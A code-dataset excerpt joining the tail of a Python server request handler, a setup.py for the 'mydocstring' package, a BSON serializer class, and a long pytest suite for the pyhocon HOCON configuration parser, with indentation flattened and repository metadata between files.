self.last_event = event = events[0]
for img in form.files.get('image-thirdParty-camera', []):
self.last_event.add_third_party_camera_image(img)
request_queue.put_nowait(event)
self.frame_counter += 1
next_action = queue_get(response_queue)
if 'sequenceId' not in next_action:
self.sequence_id += 1
next_action['sequenceId'] = self.sequence_id
else:
self.sequence_id = next_action['sequenceId']
resp = make_response(json.dumps(next_action, cls=NumpyAwareEncoder))
return resp
def start(self):
self.wsgi_server.serve_forever()
def set_init_params(self, init_params):
self.camera_near_plane = init_params['cameraNearPlane']
self.camera_far_plane = init_params['cameraFarPlane']
| 2.515625 | 3 |
setup.py | ooreilly/mydocstring | 13 | 3455 | <filename>setup.py
from setuptools import setup
setup(name='mydocstring',
version='0.2.7',
description="""A tool for extracting and converting Google-style docstrings to
plain-text, markdown, and JSON.""",
url='http://github.com/ooreilly/mydocstring',
author="<NAME>",
license='MIT',
packages=['mydocstring'],
install_requires=['mako', 'docopt'],
entry_points = {
'console_scripts': [
'mydocstring=mydocstring.docstring:main',
],},
package_data={'mydocstring': ['templates/google_docstring.md']},
zip_safe=False)
| 1.867188 | 2 |
anyser/impls/bson.py | Cologler/anyser-python | 0 | 3456 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2020~2999 - Cologler <<EMAIL>>
# ----------
#
# ----------
import bson
import struct
from ..err import SerializeError
from ..abc import *
from ..core import register_format
@register_format('bson', '.bson')
class BsonSerializer(ISerializer):
format_name = 'bson'
def loadb(self, b: bytes, options: dict) -> Any:
kwargs = {}
kwargs.update(Options.pop_origin_kwargs(options))
self.check_options(options)
try:
return bson.loads(b, **kwargs)
except Exception as e:
raise SerializeError(e)
def dumpb(self, obj, options: dict) -> bytes:
kwargs = {}
kwargs.update(Options.pop_origin_kwargs(options))
self.check_options(options)
try:
return bson.dumps(obj, **kwargs)
except Exception as e:
raise SerializeError(e)
| 2.28125 | 2 |
tests/test_config_parser.py | KevinMFong/pyhocon | 424 | 3457 | # -*- encoding: utf-8 -*-
import json
import os
import shutil
import tempfile
from collections import OrderedDict
from datetime import timedelta
from pyparsing import ParseBaseException, ParseException, ParseSyntaxException
import mock
import pytest
from pyhocon import (ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree)
from pyhocon.exceptions import (ConfigException, ConfigMissingException,
ConfigWrongTypeException)
try:
from dateutil.relativedelta import relativedelta as period
except Exception:
from datetime import timedelta as period
class TestConfigParser(object):
def test_parse_simple_value(self):
config = ConfigFactory.parse_string(
"""t = {
c = 5
"d" = true
e.y = {
f: 7
g: "hey dude!"
h: hey man
i = \"\"\"
"first line"
"second" line
\"\"\"
}
j = [1, 2, 3]
u = 192.168.1.3/32
g = null
}
"""
)
assert config.get_string('t.c') == '5'
assert config.get_int('t.c') == 5
assert config.get_float('t.c') == 5.0
assert config.get('t.e.y.f') == 7
assert config.get('t.e.y.g') == 'hey dude!'
assert config.get('t.e.y.h') == 'hey man'
assert [v.strip() for v in config.get('t.e.y.i').split('\n')] == ['', '"first line"', '"second" line', '']
assert config.get_bool('t.d') is True
assert config.get_int('t.e.y.f') == 7
assert config.get('t.j') == [1, 2, 3]
assert config.get('t.u') == '192.168.1.3/32'
assert config.get_int('t.g') is None
assert config.get_float('t.g') is None
assert config.get_string('t.g') is None
assert config.get_bool('t.g') is None
assert config.get_list('t.g') is None
assert config.get_config('t.g') is None
@pytest.mark.parametrize('forbidden_char', ['+', '`', '^', '?', '!', '@', '*', '&'])
def test_fail_parse_forbidden_characters(self, forbidden_char):
with pytest.raises(ParseBaseException):
ConfigFactory.parse_string('a: hey man{}'.format(forbidden_char))
@pytest.mark.parametrize('forbidden_char', ['$', '"'])
def test_fail_parse_forbidden_characters_in_context(self, forbidden_char):
with pytest.raises(ParseException):
ConfigFactory.parse_string('a: hey man{}'.format(forbidden_char))
@pytest.mark.parametrize('forbidden_char', ['+', '`', '^', '?', '!', '@', '*', '&'])
def test_parse_forbidden_characters_quoted(self, forbidden_char):
value = "hey man{}".format(forbidden_char)
config = ConfigFactory.parse_string('a: "{}"'.format(value))
assert config.get_string("a") == value
def test_parse_with_enclosing_brace(self):
config = ConfigFactory.parse_string(
"""
{
a: {
b: 5
}
}
"""
)
assert config.get_string('a.b') == '5'
@pytest.mark.parametrize('data_set', [
('a: 1 minutes', period(minutes=1)),
('a: 1minutes', period(minutes=1)),
('a: 2 minute', period(minutes=2)),
('a: 3 m', period(minutes=3)),
('a: 3m', period(minutes=3)),
('a: 3 min', '3 min'),
('a: 4 seconds', period(seconds=4)),
('a: 5 second', period(seconds=5)),
('a: 6 s', period(seconds=6)),
('a: 6 sec', '6 sec'),
('a: 7 hours', period(hours=7)),
('a: 8 hour', period(hours=8)),
('a: 9 h', period(hours=9)),
('a: 10 weeks', period(weeks=10)),
('a: 11 week', period(weeks=11)),
('a: 12 w', period(weeks=12)),
('a: 10 days', period(days=10)),
('a: 11 day', period(days=11)),
('a: 12 d', period(days=12)),
('a: 110 microseconds', period(microseconds=110)),
('a: 111 microsecond', period(microseconds=111)),
('a: 112 micros', period(microseconds=112)),
('a: 113 micro', period(microseconds=113)),
('a: 114 us', period(microseconds=114)),
('a: 110 milliseconds', timedelta(milliseconds=110)),
('a: 111 millisecond', timedelta(milliseconds=111)),
('a: 112 millis', timedelta(milliseconds=112)),
('a: 113 milli', timedelta(milliseconds=113)),
('a: 114 ms', timedelta(milliseconds=114)),
('a: 110 nanoseconds', period(microseconds=0)),
('a: 11000 nanoseconds', period(microseconds=11)),
('a: 1110000 nanosecond', period(microseconds=1110)),
('a: 1120000 nanos', period(microseconds=1120)),
('a: 1130000 nano', period(microseconds=1130)),
('a: 1140000 ns', period(microseconds=1140)),
])
def test_parse_string_with_duration(self, data_set):
config = ConfigFactory.parse_string(data_set[0])
assert config['a'] == data_set[1]
def test_parse_string_with_duration_with_long_unit_name(self):
config = ConfigFactory.parse_string(
"""
a: foo
b: 10 weeks
c: bar
"""
)
assert config['b'] == period(weeks=10)
def test_parse_with_list_mixed_types_with_durations_and_trailing_comma(self):
config = ConfigFactory.parse_string(
"""
a: foo
b: [a, 1, 10 weeks, 5 minutes,]
c: bar
"""
)
assert config['b'] == ['a', 1, period(weeks=10), period(minutes=5)]
def test_parse_with_enclosing_square_bracket(self):
config = ConfigFactory.parse_string("[1, 2, 3]")
assert config == [1, 2, 3]
def test_quoted_key_with_dots(self):
config = ConfigFactory.parse_string(
"""
"a.b.c.d": 3
t {
"d": {
"c": 5
}
}
k {
"b.f.d": 7
}
"""
)
assert config['"a.b.c.d"'] == 3
assert config['t.d.c'] == 5
assert config['k."b.f.d"'] == 7
def test_dotted_notation_merge(self):
config = ConfigFactory.parse_string(
"""
a {
b = foo
c = bar
}
a.c = ${a.b}" "${a.b}
a.d = baz
"""
)
assert config['a.b'] == "foo"
assert config['a.c'] == "foo foo"
assert config['a.d'] == "baz"
def test_comma_to_separate_expr(self):
config = ConfigFactory.parse_string(
"""
a=1,
b="abc",
c=the man,
d=woof,
a-b-c-d=test,
a b c d=test2,
"a b c d e"=test3
"""
)
assert config.get('a') == 1
assert config.get('b') == 'abc'
assert config.get('c') == 'the man'
assert config.get('d') == 'woof'
assert config.get('a-b-c-d') == 'test'
assert config.get('a b c d') == 'test2'
assert config.get('a b c d e') == 'test3'
def test_dict_merge(self):
config = ConfigFactory.parse_string(
"""
a {
d {
g.h.j.u: 5
g {
h.d: 4
}
g.h.k: f d
}
h.i.m = 7
h.i {
d: 5
}
h.i {
e:65
}
}
""")
expected_result = {
"a": {
"d": {
"g": {
"h": {
"j": {
"u": 5
},
"d": 4,
"k": "f d"
}
}
},
"h": {
"i": {
"m": 7,
"d": 5,
"e": 65
}
}
}
}
assert expected_result == config
def test_parse_with_comments(self):
config = ConfigFactory.parse_string(
"""
// comment 1
# comment 2
{
c = test // comment 0
g = 6 test # comment 0
# comment 3
a: { # comment 4
b: test, # comment 5
} # comment 6
t = [1, # comment 7
2, # comment 8
3, # comment 9
]
} # comment 10
// comment 11
// comment 12
"""
)
assert config.get('c') == 'test'
assert config.get('g') == '6 test'
assert config.get('a.b') == 'test'
assert config.get_string('a.b') == 'test'
assert config.get('t') == [1, 2, 3]
def test_missing_config(self):
config = ConfigFactory.parse_string(
"""
a = 5
"""
)
# b is not set so show raise an exception
with pytest.raises(ConfigMissingException):
config.get('b')
def test_parse_null(self):
config = ConfigFactory.parse_string(
"""
a = null
b = [null]
"""
)
assert config.get('a') is None
assert config.get('b')[0] is None
def test_parse_override(self):
config = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = 5
}
}
a.b {
c = 7
d = 8
}
}
"""
)
assert config.get('a.b.c') == 7
assert config.get('a.b.d') == 8
def test_concat_dict(self):
config = ConfigFactory.parse_string(
"""
a: {b: 1}
a: {c: 2}
b: {c: 3} {d: 4} {
c: 5
}
"""
)
assert config.get('a.b') == 1
assert config.get('a.c') == 2
assert config.get('b.c') == 5
assert config.get('b.d') == 4
def test_concat_string(self):
config = ConfigFactory.parse_string(
"""
a = a b c
b = 5 b
c = b 7
"""
)
assert config.get('a') == 'a b c'
assert config.get('b') == '5 b'
assert config.get('c') == 'b 7'
def test_concat_list(self):
config = ConfigFactory.parse_string(
"""
a = [1, 2] [3, 4] [
5,
6
]
"""
)
assert config.get('a') == [1, 2, 3, 4, 5, 6]
assert config.get_list('a') == [1, 2, 3, 4, 5, 6]
def test_bad_concat(self):
ConfigFactory.parse_string('a = 45\n')
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string('a = [4] "4"')
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string('a = "4" [5]')
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string('a = {b: 5} "4"')
def test_string_substitutions(self):
config1 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = str
e = "str "
}
}
d = ${a.b.c}
f = ${a.b.e}
}
"""
)
assert config1.get('a.b.c') == 'str'
assert config1.get('d') == 'str'
assert config1.get('f') == 'str '
config2 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = str
e = "str "
}
}
d = test ${a.b.c}
f = test ${a.b.e}
}
"""
)
assert config2.get('a.b.c') == 'str'
assert config2.get('d') == 'test str'
assert config2.get('f') == 'test str '
config3 = ConfigFactory.parse_string(
u"""
{
a: {
b: {
c = str
e = "str "
}
}
d = test ${a.b.c} me
f = test ${a.b.e} me
}
"""
)
assert config3.get('a.b.c') == 'str'
assert config3.get('d') == 'test str me'
assert config3.get('f') == 'test str me'
def test_string_substitutions_with_no_space(self):
config = ConfigFactory.parse_string(
"""
app.heap_size = 128
app.java_opts = [
-Xms${app.heap_size}m
-Xmx${app.heap_size}m
]
"""
)
assert config.get('app.java_opts') == [
'-Xms128m',
'-Xmx128m'
]
def test_int_substitutions(self):
config1 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = 5
}
}
d = ${a.b.c}
}
"""
)
assert config1.get('a.b.c') == 5
assert config1.get('d') == 5
config2 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = 5
}
}
d = test ${a.b.c}
}
"""
)
assert config2.get('a.b.c') == 5
assert config2.get('d') == 'test 5'
config3 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = 5
}
}
d = test ${a.b.c} me
}
"""
)
assert config3.get('a.b.c') == 5
assert config3.get('d') == 'test 5 me'
def test_cascade_string_substitutions(self):
config = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = ${e}
}
}
d = test ${a.b.c} me
e = 7
}
"""
)
assert config.get('a.b.c') == 7
assert config.get('d') == 'test 7 me'
def test_multiple_substitutions(self):
config = ConfigFactory.parse_string(
"""
a = 5
b=${a}${a}
c=${a} ${a}
"""
)
assert config == {
'a': 5,
'b': '55',
'c': '5 5'
}
def test_dict_substitutions(self):
config = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = ${data-center-generic} {name = "east"}
"""
)
assert config.get('data-center-east.cluster-size') == 6
assert config.get('data-center-east.name') == 'east'
config2 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = {name = "east"} ${data-center-generic}
"""
)
assert config2.get('data-center-east.cluster-size') == 6
assert config2.get('data-center-east.name') == 'east'
config3 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = {name = "east"} ${data-center-generic} { cluster-size = 9, opts = "-Xmx4g" }
"""
)
assert config3.get('data-center-east.cluster-size') == 9
assert config3.get('data-center-east.name') == 'east'
assert config3.get('data-center-east.opts') == '-Xmx4g'
config4 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = {name = "east"} ${data-center-generic}
data-center-east-prod = ${data-center-east} {tmpDir=/tmp}
"""
)
assert config4.get('data-center-east.cluster-size') == 6
assert config4.get('data-center-east.name') == 'east'
assert config4.get('data-center-east-prod.cluster-size') == 6
assert config4.get('data-center-east-prod.tmpDir') == '/tmp'
config5 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = ${data-center-generic}
data-center-east = { name = "east" }
"""
)
assert config5['data-center-east'] == {
'name': 'east',
'cluster-size': 6
}
config6 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = { name = "east" }
data-center-east = ${data-center-generic}
"""
)
assert config6['data-center-east'] == {
'name': 'east',
'cluster-size': 6
}
def test_dos_chars_with_unquoted_string_noeol(self):
config = ConfigFactory.parse_string("foo = bar")
assert config['foo'] == 'bar'
def test_dos_chars_with_quoted_string_noeol(self):
config = ConfigFactory.parse_string('foo = "5"')
assert config['foo'] == '5'
def test_dos_chars_with_triple_quoted_string_noeol(self):
config = ConfigFactory.parse_string('foo = """5"""')
assert config['foo'] == '5'
def test_dos_chars_with_int_noeol(self):
config = ConfigFactory.parse_string("foo = 5")
assert config['foo'] == 5
def test_dos_chars_with_float_noeol(self):
config = ConfigFactory.parse_string("foo = 5.0")
assert config['foo'] == 5.0
def test_list_substitutions(self):
config = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = ${common_modules} [java]
"""
)
assert config.get('host_modules') == ['php', 'python', 'java']
config2 = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = [java] ${common_modules}
"""
)
assert config2.get('host_modules') == ['java', 'php', 'python']
config3 = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = [java] ${common_modules} [perl]
"""
)
assert config3.get('common_modules') == ['php', 'python']
assert config3.get('host_modules') == ['java', 'php', 'python', 'perl']
config4 = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = [java] ${common_modules} [perl]
full_modules = ${host_modules} [c, go]
"""
)
assert config4.get('common_modules') == ['php', 'python']
assert config4.get('host_modules') == ['java', 'php', 'python', 'perl']
assert config4.get('full_modules') == ['java', 'php', 'python', 'perl', 'c', 'go']
def test_list_element_substitution(self):
config = ConfigFactory.parse_string(
"""
main_language = php
languages = [java, ${main_language}]
"""
)
assert config.get('languages') == ['java', 'php']
def test_substitution_list_with_append(self):
config = ConfigFactory.parse_string(
"""
application.foo = 128mm
application.large-jvm-opts = ["-XX:+UseParNewGC"] [-Xm16g, ${application.foo}]
application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ["-XX:+UseParNewGC"]
""")
assert config["application.large-jvm-opts"] == [
'-XX:+UseParNewGC',
'-Xm16g',
'128mm'
]
assert config["application.large-jvm-opts2"] == [
'-Xm16g',
'128mm',
'-XX:+UseParNewGC',
]
def test_substitution_list_with_append_substitution(self):
config = ConfigFactory.parse_string(
"""
application.foo = 128mm
application.default-jvm-opts = ["-XX:+UseParNewGC"]
application.large-jvm-opts = ${application.default-jvm-opts} [-Xm16g, ${application.foo}]
application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ${application.default-jvm-opts}
""")
assert config["application.large-jvm-opts"] == [
'-XX:+UseParNewGC',
'-Xm16g',
'128mm'
]
assert config["application.large-jvm-opts2"] == [
'-Xm16g',
'128mm',
'-XX:+UseParNewGC'
]
def test_non_existent_substitution(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = ${non_existent}
"""
)
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = abc ${non_existent}
"""
)
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = ${non_existent} abc
"""
)
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = abc ${non_existent} def
"""
)
def test_non_compatible_substitution(self):
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = 55 ${common_modules}
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = ${common_modules} 55
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = aa ${common_modules} bb
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = aa ${common_modules}
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = ${common_modules} aa
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = aa ${common_modules} bb
"""
)
def test_self_ref_substitution_array(self):
config = ConfigFactory.parse_string(
"""
x = [1,2]
x = ${x} [3,4]
x = [-1, 0] ${x} [5, 6]
x = [-3, -2] ${x}
"""
)
assert config.get("x") == [-3, -2, -1, 0, 1, 2, 3, 4, 5, 6]
def test_self_append_array(self):
config = ConfigFactory.parse_string(
"""
x = [1,2]
x += [3,4]
"""
)
assert config.get("x") == [1, 2, 3, 4]
def test_self_append_string(self):
'''
Should be equivalent to
x = abc
x = ${?x} def
'''
config = ConfigFactory.parse_string(
"""
x = abc
x += def
"""
)
assert config.get("x") == "abc def"
def test_self_append_non_existent_string(self):
'''
Should be equivalent to x = ${?x} def
'''
config = ConfigFactory.parse_string(
"""
x += def
"""
)
assert config.get("x") == " def"
def test_self_append_nonexistent_array(self):
config = ConfigFactory.parse_string(
"""
x += [1,2]
"""
)
assert config.get("x") == [1, 2]
def test_self_append_object(self):
config = ConfigFactory.parse_string(
"""
x = {a: 1}
x += {b: 2}
"""
)
assert config.get("x") == {'a': 1, 'b': 2}
def test_self_append_nonexistent_object(self):
config = ConfigFactory.parse_string(
"""
x += {a: 1}
"""
)
assert config.get("x") == {'a': 1}
def test_self_ref_substitution_array_to_dict(self):
config = ConfigFactory.parse_string(
"""
x = [1,2]
x = {x: [3,4]}
x = {y: [5,6]}
x = {z: ${x}}
"""
)
assert config.get("x.x") == [3, 4]
assert config.get("x.y") == [5, 6]
assert config.get("x.z") == {'x': [3, 4], 'y': [5, 6]}
def test_self_ref_substitiotion_dict_in_array(self):
config = ConfigFactory.parse_string(
"""
x = {x: [3,4]}
x = [${x}, 2, 3]
"""
)
(one, two, three) = config.get("x")
assert one == {'x': [3, 4]}
assert two == 2
assert three == 3
def test_self_ref_substitution_dict_path(self):
config = ConfigFactory.parse_string(
"""
x = {y: {z: 1}}
x = ${x.y}
"""
)
assert config.get("x.y") == {'z': 1}
assert config.get("x.z") == 1
assert set(config.get("x").keys()) == set(['y', 'z'])
def test_self_ref_substitution_dict_path_hide(self):
config = ConfigFactory.parse_string(
"""
x = {y: {y: 1}}
x = ${x.y}
"""
)
assert config.get("x.y") == 1
assert set(config.get("x").keys()) == set(['y'])
def test_self_ref_substitution_dict_recurse(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
x = ${x}
"""
)
def test_self_ref_substitution_dict_recurse2(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
x = ${x}
x = ${x}
"""
)
def test_self_ref_substitution_dict_merge(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
foo : { a : { c : 1 } }
foo : ${foo.a}
foo : { a : 2 }
"""
)
assert config.get('foo') == {'a': 2, 'c': 1}
assert set(config.keys()) == set(['foo'])
def test_self_ref_substitution_dict_otherfield(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
bar : {
foo : 42,
baz : ${bar.foo}
}
"""
)
assert config.get("bar") == {'foo': 42, 'baz': 42}
assert set(config.keys()) == set(['bar'])
def test_self_ref_substitution_dict_otherfield_merged_in(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
bar : {
foo : 42,
baz : ${bar.foo}
}
bar : { foo : 43 }
"""
)
assert config.get("bar") == {'foo': 43, 'baz': 43}
assert set(config.keys()) == set(['bar'])
def test_self_ref_substitution_dict_otherfield_merged_in_mutual(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
// bar.a should end up as 4
bar : { a : ${foo.d}, b : 1 }
bar.b = 3
// foo.c should end up as 3
foo : { c : ${bar.b}, d : 2 }
foo.d = 4
"""
)
assert config.get("bar") == {'a': 4, 'b': 3}
assert config.get("foo") == {'c': 3, 'd': 4}
assert set(config.keys()) == set(['bar', 'foo'])
def test_self_ref_substitution_string_opt_concat(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
a = ${?a}foo
"""
)
assert config.get("a") == 'foo'
assert set(config.keys()) == set(['a'])
def test_self_ref_substitution_dict_recurse_part(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
x = ${x} {y: 1}
x = ${x.y}
"""
)
def test_self_ref_substitution_object(self):
config = ConfigFactory.parse_string(
"""
x = {a: 1, b: 2}
x = ${x} {c: 3}
x = {z: 0} ${x}
x = {y: -1} ${x} {d: 4}
"""
)
assert config.get("x") == {'a': 1, 'b': 2, 'c': 3, 'z': 0, 'y': -1, 'd': 4}
def test_self_ref_child(self):
config = ConfigFactory.parse_string(
"""
a.b = 3
a.b = ${a.b}
a.b = ${a.b}
a.c = [1,2]
a.c = ${a.c}
a.d = {foo: bar}
a.d = ${a.d}
"""
)
assert config.get("a") == {'b': 3, 'c': [1, 2], 'd': {'foo': 'bar'}}
def test_concat_multi_line_string(self):
config = ConfigFactory.parse_string(
"""
common_modules = perl \
java \
python
"""
)
assert [x.strip() for x in config['common_modules'].split() if x.strip(' ') != ''] == ['perl', 'java', 'python']
def test_concat_multi_line_list(self):
config = ConfigFactory.parse_string(
"""
common_modules = [perl] \
[java] \
[python]
"""
)
assert config['common_modules'] == ['perl', 'java', 'python']
def test_concat_multi_line_dict(self):
config = ConfigFactory.parse_string(
"""
common_modules = {a:perl} \
{b:java} \
{c:python}
"""
)
assert config['common_modules'] == {'a': 'perl', 'b': 'java', 'c': 'python'}
def test_parse_URL_from_samples(self):
config = ConfigFactory.parse_URL("file:samples/aws.conf")
assert config.get('data-center-generic.cluster-size') == 6
assert config.get('large-jvm-opts') == ['-XX:+UseParNewGC', '-Xm16g']
def test_parse_URL_from_invalid(self):
config = ConfigFactory.parse_URL("https://nosuchurl")
assert config == []
def test_include_dict_from_samples(self):
config = ConfigFactory.parse_file("samples/animals.conf")
assert config.get('cat.garfield.say') == 'meow'
assert config.get('dog.mutt.hates.garfield.say') == 'meow'
def test_include_glob_dict_from_samples(self):
config = ConfigFactory.parse_file("samples/all_animals.conf")
assert config.get('animals.garfield.say') == 'meow'
assert config.get('animals.mutt.hates.garfield.say') == 'meow'
def test_include_glob_list_from_samples(self):
config = ConfigFactory.parse_file("samples/all_bars.conf")
bars = config.get_list('bars')
assert len(bars) == 10
names = {bar['name'] for bar in bars}
types = {bar['type'] for bar in bars if 'type' in bar}
print(types, '(((((')
assert '<NAME>' in names
assert 'Homer\'s favorite coffee' in names
assert 'milk' in types
def test_list_of_dicts(self):
config = ConfigFactory.parse_string(
"""
a: [
{a: 1, b: 2},
{a: 3, c: 4},
]
"""
)
assert config['a'] == [
{'a': 1, 'b': 2},
{'a': 3, 'c': 4}
]
def test_list_of_lists(self):
config = ConfigFactory.parse_string(
"""
a: [
[1, 2]
[3, 4]
]
"""
)
assert config['a'] == [
[1, 2],
[3, 4]
]
def test_list_of_dicts_with_merge(self):
config = ConfigFactory.parse_string(
"""
b = {f: 4}
a: [
${b} {a: 1, b: 2},
{a: 3, c: 4} ${b},
{a: 3} ${b} {c: 6},
]
"""
)
assert config['a'] == [
{'a': 1, 'b': 2, 'f': 4},
{'a': 3, 'c': 4, 'f': 4},
{'a': 3, 'c': 6, 'f': 4}
]
def test_list_of_lists_with_merge(self):
config = ConfigFactory.parse_string(
"""
b = [5, 6]
a: [
${b} [1, 2]
[3, 4] ${b}
[1, 2] ${b} [7, 8]
]
"""
)
assert config['a'] == [
[5, 6, 1, 2],
[3, 4, 5, 6],
[1, 2, 5, 6, 7, 8]
]
def test_invalid_assignment(self):
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string('common_modules [perl]')
with pytest.raises(ParseException):
ConfigFactory.parse_string('common_modules {} {perl: 1}')
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string(
"""
a = {f: 5}
common_modules ${a} {perl: 1}
""")
def test_invalid_dict(self):
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string(
"""
a = {
f: 5
g
}
""")
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string('a = {g}')
def test_include_file(self):
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('[1, 2]')
fdin.flush()
config1 = ConfigFactory.parse_string(
"""
a: [
include "{tmp_file}"
]
""".format(tmp_file=fdin.name)
)
assert config1['a'] == [1, 2]
config2 = ConfigFactory.parse_string(
"""
a: [
include file("{tmp_file}")
]
""".format(tmp_file=fdin.name)
)
assert config2['a'] == [1, 2]
config3 = ConfigFactory.parse_string(
"""
a: [
include url("file://{tmp_file}")
]
""".format(tmp_file=fdin.name)
)
assert config3['a'] == [1, 2]
def test_include_missing_file(self):
config1 = ConfigFactory.parse_string(
"""
a: [
include "dummy.txt"
3
4
]
"""
)
assert config1['a'] == [3, 4]
def test_include_required_file(self):
config = ConfigFactory.parse_string(
"""
a {
include required("samples/animals.d/cat.conf")
t = 2
}
"""
)
expected = {
'a': {
'garfield': {
'say': 'meow'
},
't': 2
}
}
assert expected == config
config2 = ConfigFactory.parse_string(
"""
a {
include required(file("samples/animals.d/cat.conf"))
t = 2
}
"""
)
assert expected == config2
def test_include_missing_required_file(self):
with pytest.raises(IOError):
ConfigFactory.parse_string(
"""
a: [
include required("dummy.txt")
3
4
]
"""
)
def test_resolve_package_path(self):
path = ConfigParser.resolve_package_path("pyhocon:config_parser.py")
assert os.path.exists(path)
def test_resolve_package_path_format(self):
with pytest.raises(ValueError):
ConfigParser.resolve_package_path("pyhocon/config_parser.py")
def test_resolve_package_path_missing(self):
with pytest.raises(ImportError):
ConfigParser.resolve_package_path("non_existent_module:foo.py")
def test_include_package_file(self, monkeypatch):
temp_dir = tempfile.mkdtemp()
try:
module_dir = os.path.join(temp_dir, 'my_module')
module_conf = os.path.join(module_dir, 'my.conf')
# create the module folder and necessary files (__init__ and config)
os.mkdir(module_dir)
open(os.path.join(module_dir, '__init__.py'), 'a').close()
with open(module_conf, 'w') as fdin:
fdin.write("{c: 3}")
# add the temp dir to sys.path so that 'my_module' can be discovered
monkeypatch.syspath_prepend(temp_dir)
# load the config and include the other config file from 'my_module'
config = ConfigFactory.parse_string(
"""
a: 1
b: 2
include package("my_module:my.conf")
"""
)
# check that the contents of both config files are available
assert dict(config.as_plain_ordered_dict()) == {'a': 1, 'b': 2, 'c': 3}
finally:
shutil.rmtree(temp_dir, ignore_errors=True)
def test_include_dict(self):
expected_res = {
'a': 1,
'b': 2,
'c': 3,
'd': 4
}
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('{a: 1, b: 2}')
fdin.flush()
config1 = ConfigFactory.parse_string(
"""
a: {{
include "{tmp_file}"
c: 3
d: 4
}}
""".format(tmp_file=fdin.name)
)
assert config1['a'] == expected_res
config2 = ConfigFactory.parse_string(
"""
a: {{
c: 3
d: 4
include "{tmp_file}"
}}
""".format(tmp_file=fdin.name)
)
assert config2['a'] == expected_res
config3 = ConfigFactory.parse_string(
"""
a: {{
c: 3
include "{tmp_file}"
d: 4
}}
""".format(tmp_file=fdin.name)
)
assert config3['a'] == expected_res
def test_include_substitution(self):
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('y = ${x}')
fdin.flush()
config = ConfigFactory.parse_string(
"""
include "{tmp_file}"
x = 42
""".format(tmp_file=fdin.name)
)
assert config['x'] == 42
assert config['y'] == 42
@pytest.mark.xfail
def test_include_substitution2(self):
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('{ x : 10, y : ${x} }')
fdin.flush()
config = ConfigFactory.parse_string(
"""
{
a : { include """ + '"' + fdin.name + """" }
a : { x : 42 }
}
"""
)
assert config['a']['x'] == 42
assert config['a']['y'] == 42
def test_var_with_include_keyword(self):
config = ConfigFactory.parse_string(
"""
include-database=true
""")
assert config == {
'include-database': True
}
def test_substitution_override(self):
config = ConfigFactory.parse_string(
"""
database {
host = localhost
port = 5432
user = people
name = peopledb
pass = <PASSWORD>
}
user=test_user
pass=<PASSWORD>
database {
user = ${user}
pass = ${pass}
}
""")
assert config['database.user'] == 'test_user'
assert config['database.pass'] == '<PASSWORD>'
def test_substitution_flat_override(self):
config = ConfigFactory.parse_string(
"""
database {
name = peopledb
pass = <PASSWORD>
name = ${?NOT_EXISTS}
pass = ${?NOT_EXISTS}
}
""")
assert config['database.name'] == 'peopledb'
assert config['database.pass'] == '<PASSWORD>'
def test_substitution_multiple_override(self):
config = ConfigFactory.parse_string(
"""
a: 1
b: foo
c: ${a} ${b}
c: ${b} ${a}
d: ${a} ${b}
d: ${a} bar
""")
assert config['c'] == 'foo 1'
assert config['d'] == '1 bar'
